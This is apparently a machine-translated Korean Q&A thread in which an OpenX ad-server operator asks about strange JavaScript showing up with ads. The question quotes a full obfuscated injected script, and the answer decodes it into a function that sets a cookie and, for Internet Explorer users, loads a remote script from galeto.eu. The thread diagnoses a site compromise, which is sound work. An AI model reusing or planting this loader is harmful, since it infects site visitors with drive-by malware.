이상한 javascript 코드를 표시하는 OpenX

Question

내 사이트에서 OpenX 광고 서버를 실행하고 있으며 최근에는 광고와 함께 이상한 코드가 표시되는 것을 보았습니다. OpenX 코드의 일부인지 아니면 응용 프로그램이 어떻게 든 손상된 것인지 확실하지 않습니다. 아마도 javascript 지식을 가진 사람이 나를 설명 할 수 있습니다. 평가 때

<script>try{_=~[];_={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};_.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;_.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;_.$=(_.___)[_.$_][_.$_];_.$(_.$(_.$$+"\""+_.$$_$+"="+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";"+_._+_.$_$_+"=\\"+_.__$+_.$_$+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$_$_+_.__+_._$+"\\"+_.__$+_.$$_+_._$_+"."+_._+"\\"+_.__$+_.$$_+_._$$+_.$$$_+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.___+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";\\"+_.__$+_.$_$+_.__$+_.$$$$+"("+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"==="+_._+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_.$$$_+_.$$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+_.$$_$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('_"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"=')==-"+_.__$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_._$_+_.$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_._$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_.$$_+"\\"+_.__$+_._$_+_.$__+"\\"+_.$__+_.___+"')>"+_.___+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_.__$+_.$_$+"\\"+_.__$+_._$_+_._$$+"\\"+_.__$+_.__$+_.__$+"\\"+_.__$+_.___+_.$_$+"\\"+_.$__+_.___+"')>"+_.___+")\\"+_.$__+_.___+"{"+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"="+_.__$+";"+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+"='__"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"="+_.__$+";\\"+_.$__+_.___+_.$$$_+"\\"+_.__$+_.$$$+_.___+"\\"+_.__$+_.$$_+_.___+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_._$_+_.$$$_+"\\"+_.__$+_.$$_+_._$$+"=\\"+_.__$+_._$_+_.$$$+_.$$$_+_.$$_$+",\\"+_.$__+_.___+_.___+_.__$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_._$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+"\\"+_.$__+_.___+_._$_+_.___+_._$_+_.___+"\\"+_.$__+_.___+_.___+_.___+":"+_.___+_.___+":"+_.___+_.___+"\\"+_.$__+_.___+"\\"+_.__$+_._$_+_.$_$+"\\"+_.__$+_._$_+_.$__+"\\"+_.__$+_.___+_._$$+";\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_.___+_.$_$_+_.__+"\\"+_.__$+_.$_$+_.___+"=/';"+_.$$_$+".\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+_.__+_.$$$_+(![]+"")[_._$_]+"\\"+_.__$+_.$_$+_.$$_+"(\\\"<\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\\"+\\\"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_._$$+"\\"+_.__$+_.$$_+_._$_+_.$$__+"='\\"+_.__$+_.$_$+_.___+_.__+_.__+"\\"+_.__$+_.$$_+_.___+"://\\"+_.__$+_.$__+_.$$$+_.$_$_+(![]+"")[_._$_]+_.$$$_+_.__+_._$+"."+_.$$$_+_._+"/"+_.$_$+_.$$_$+_.$$_+_._$_+_.___+_.$$_+_.$$_$+_.$$_$+".\\"+_.__$+_.$_$+_._$_+"\\"+_.__$+_.$$_+_._$$+"?"+_.$$__+"\\"+_.__$+_.$$_+_.___+"=\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"."+_.$_$$+"\\"+_.__$+_.$$_+_._$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"."+_.$$__+_._$+"\\"+_.__$+_.$_$+_.$_$+"'></\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\\"+\\\"\\"+_.__$+_.$$_+_.___+_.__+">\\\");}"+"\"")())();}catch(e){}</script> 

Answer 1

는 난독 화 코드가이 함수를 정의하고 실행합니다 :

function anonymous() { 
    d=document;ua=navigator.userAgent; 
    if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) { 
     d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/'; 
     d.writeln("<scr"+"ipt src='http://galeto.eu/5d6206dd.js?cp=www.domain.com'></scri"+"pt>"); 
    } 
} 

기본적으로,이 쿠키를 설정하고 추가 자바 스크립트 파일을로드 이것은 코드입니다.